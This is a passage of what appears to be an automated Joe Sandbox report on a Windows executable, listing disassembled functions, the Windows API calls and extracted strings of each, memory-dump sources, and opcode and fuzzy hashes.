                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: PE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2941894976-4258593460
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d3dbf6eefc0a2a227ef4b7c3a1a58b27db0905244b1f318b974def68cec07f75
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F414161A0869B86F760BB11E41027DF7A0FB89B90FD44232DA5E43BA5DF7DE445CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1539B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Enum$Openwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3402383852-1459555574
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d4f4c8f74af0d88aae95a380f5de156173e19187bb68339be651d734a87c6bac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14A1A3A2A0864B82FB11BB55D0542BEE3A0EF86B90FD44532DA4F077A4DFBCD945C360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %04X-%04X$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 930873262-1938371929
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 479f350910c1d7edeb5b2b6a9a7a351206144802c38d22ce21a0ea5ed230f0e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25414B21A0CA8B82FB64AB60E4502BEF3A0EB88755FD04137DA5F436A5DFBCD545C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15236EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3249344982-2616576482
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d7d38d81121354050f916f34c4663a8d1a04ecee0d9816bd4e96b5d9d2e7dbd7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A415E72618B4A86F7509F12A84436DBAA4FB49BC4FC84276DA4A477B4CF7CD1148B10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1526A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526A73
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526A91
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526AB0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526AE3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526B01
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2770779731-632268628
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6d428d263f2126f0e5c8e7bd73756f6dfc38bb692bfa2ac7bc216d10df8e933b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C631DA22A09A5A85FB50AF12E45027DB6A0FB45F45BD581B6DA4E433A4EFBCA404C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1521630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521673
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152168D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521757
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152176E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521788
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152179C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Alloc$Size
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3586862581-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b25d85015698b8fd5004c13fe7897ec76e3a16acea9ed2acde6e18fcbf1eb1ca
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0916D62A09A5B81FB14AF15A49427DB6A0FB44B90FD98176DA4F837B0DFBCE441C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15286F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1313749407-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 487f39fc629e3016de51122b32d9271a89bd1cf49c2c42690b15f4d1d5844f41
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6851AF22B0968B42FB50BB51A8042BDE6D1BF55B90FD852B2DD5F477B0DFBCE4418260
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1515984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1533687
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15336A6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15336EB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1533703
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D1533722
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1066134489-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 739ea113db7b8f67668758fab7650505954dd704e5e7961a1ceb554f2bd9e5ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4518F26B0864B8AFBA56B21950457EE691EB45B90FC84436DE0F477B4DFBCE440CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 411561164-4129271751
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5a5cd9169d0acb644468e003062e23938e809f2f8255e8309db0a2afc90e2e33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E216020A0CA0B96FB54BB29A45517DE6A1EF84750FD09233C61F472F5DEFC94448760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1523578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1523584
